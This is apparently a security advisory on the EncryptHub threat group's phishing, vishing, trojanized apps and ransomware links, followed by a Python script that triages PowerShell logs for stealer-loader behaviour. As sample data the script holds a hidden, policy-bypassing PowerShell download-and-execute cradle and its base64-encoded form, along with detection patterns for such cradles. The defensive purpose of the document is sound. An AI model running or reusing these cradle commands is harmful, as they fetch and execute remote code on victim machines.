EncryptHub Deploys Ransomware and Stealer via Trojanized Apps, PPI Services, and Phishing
Summary:
EncryptHub, a financially motivated threat actor, has been conducting sophisticated phishing campaigns to distribute information stealers and ransomware while also developing a new tool called EncryptRAT. First identified in June 2024, EncryptHub employs a multi-pronged approach, including trojanized software distribution, social engineering, and the use of third-party Pay-Per-Install (PPI) services to maximize the reach of its malware. The group is also tracked by Swiss cybersecurity firm PRODAFT as LARVA-208 and has been linked to the RansomHub and BlackSuit ransomware operations.
EncryptHub primarily targets users of widely used applications by distributing trojanized versions through deceptive phishing campaigns. Once installed, these applications trigger multi-stage infections that facilitate the deployment of secondary payloads such as Kematian Stealer, designed for cookie theft and credential harvesting. The group also relies on smishing and vishing attacks to compromise victims. Targets receive phishing SMS messages or are contacted via fraudulent IT support calls, where they are directed to enter their credentials on fake websites under the pretext of resolving technical issues. Often, the group impersonates IT departments or helpdesk teams to gain trust. If the phishing attack is conducted through SMS, victims are typically lured with fake Microsoft Teams links designed to harvest login credentials. The stolen credentials are then used to infiltrate organizations' networks, allowing the deployment of malware and, in many cases, ransomware.
Once a target is compromised, EncryptHub executes PowerShell scripts to install stealer malware such as Fickle, StealC, and Rhadamanthys. These information stealers harvest sensitive data, including credentials, browser cookies, and session tokens, which can be used to extend the intrusion or sold on underground forums. In many cases, the end goal is to deploy ransomware and extort the victim for decryption. EncryptHub's ransomware activity is closely tied to RansomHub and BlackSuit, indicating likely collaboration with or affiliation to these ransomware-as-a-service (RaaS) operations. The group's ability to breach high-value organizations through social engineering alone, without relying on software exploits, makes it a significant threat.
Security Officer Comments:
A crucial component of EncryptHub’s malware distribution strategy has been its reliance on third-party PPI services, particularly LabInstalls, which facilitates bulk malware installations. LabInstalls offers packages starting at $10 for 100 installations and up to $450 for 10,000 installations, enabling EncryptHub to expand its reach significantly. EncryptHub was observed confirming its use of LabInstalls by leaving positive feedback on the Russian-speaking underground forum XSS, even sharing a screenshot as proof. This reliance on PPI services streamlines their malware distribution efforts, allowing them to target a broader range of victims with minimal effort.
Suggested Corrections:
The rapid evolution of EncryptHub’s tactics underscores the critical need for continuous monitoring and proactive security measures to mitigate the threat posed by the group. Organizations should adopt multi-layered security strategies, including:
- Employee training to recognize phishing and social engineering attempts.
- Enforcing Multi-Factor Authentication (MFA), preferably phishing-resistant methods, so harvested passwords alone do not grant access; note that the vishing lure described above can still be used to talk a victim through an MFA prompt.
- Regular security patches and updates to mitigate vulnerabilities exploited by threat actors.
- Blocking access to known malicious hosting providers, such as the Yalishanda bulletproof hosting service, to cut off access to the phishing sites.
- Implementing endpoint detection and response (EDR) and enabling PowerShell script block logging (Event ID 4104) so that PowerShell-based loaders, including encoded commands and download cradles, are visible and alertable.
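As an added example that is not part of the original article and not EncryptHub tooling, the following Python triages PowerShell script block logging records (Windows Event ID 4104) for the behaviours a stealer loader typically needs: a download cradle, Invoke-Expression, a hidden window, an execution policy bypass, and an -EncodedCommand blob, which it base64/UTF-16LE decodes and rescans. The sample records, host and user names, the 203.0.113.10 address (a documentation range), the indicator patterns and the weights are all constructed assumptions for illustration, not observed EncryptHub indicators.

```python
import base64
import binascii
import re

# Constructed sample records shaped like Event ID 4104 entries as a SIEM might
# export them. None of these are real logs or real EncryptHub commands.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/up.ps1')"
# PowerShell's -EncodedCommand expects base64 of the UTF-16LE script text.
STAGER_B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "jdoe", "event_id": 4104,
     "script_block": r"Get-ChildItem C:\Users\jdoe\Documents | Measure-Object"},
    {"host": "WS-014", "user": "jdoe", "event_id": 4104,
     "script_block": f"powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand {STAGER_B64}"},
    {"host": "WS-022", "user": "asmith", "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/loader.ps1')"},
    {"host": "WS-031", "user": "admin01", "event_id": 4104,
     "script_block": r"Invoke-WebRequest -Uri https://example.test/tool.zip -OutFile C:\Temp\tool.zip"},
    {"host": "WS-031", "user": "admin01", "event_id": 4103,
     "script_block": "Invoke-Expression ignored-because-wrong-event-id"},
]

# Indicator patterns (assumptions, not a vendor rule set). Abbreviated switches
# such as -NoP, -W, -Exec and -Enc are accepted by powershell.exe, so the
# patterns allow them too.
ENCODED_RX = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:in[a-z]*)?\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ep|ex[a-z]*)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load|FromBase64String", re.I),
}
WEIGHTS = {"download_cradle": 3, "invoke_expression": 3, "hidden_window": 2,
           "exec_policy_bypass": 2, "no_profile": 1, "reflective_load": 3,
           "encoded_command": 2}
ALERT_THRESHOLD = 5  # a lone Invoke-WebRequest (3) stays below it; cradle + IEX (6) does not


def decode_encoded_command(blob):
    """Decode an -EncodedCommand blob (base64 of UTF-16LE); None if malformed."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="ignore")


def analyze_script_block(script_block):
    m = ENCODED_RX.search(script_block)
    decoded = decode_encoded_command(m.group(2)) if m else None
    # Scan the command line with the base64 blob removed, so random base64 text
    # cannot trip a keyword pattern, plus the decoded payload when there is one.
    visible = ENCODED_RX.sub(r"-\1 <blob>", script_block)
    text = visible if decoded is None else visible + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if m:
        hits.append("encoded_command")
    hits.sort()
    score = sum(WEIGHTS[name] for name in hits)
    return {"indicators": hits, "score": score, "decoded": decoded,
            "alert": score >= ALERT_THRESHOLD}


def triage_events(events):
    """Return one alert dict per 4104 record whose score reaches the threshold."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        result = analyze_script_block(ev["script_block"])
        if result["alert"]:
            alerts.append({"host": ev["host"], "user": ev["user"], **result})
    return alerts


if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(f"{alert['host']}/{alert['user']}: score={alert['score']} "
              f"indicators={alert['indicators']}")
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The weighting is deliberately simple: a single Invoke-WebRequest from an administrator does not alert on its own, while a download cradle piped into Invoke-Expression, or a hidden, policy-bypassing encoded command, does. The decode step matters because an EDR rule that only inspects the visible command line never sees the cradle hidden inside the base64 blob.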
https://thehackernews.com/2025/03/encrypthub-deploys-ransomware-and.html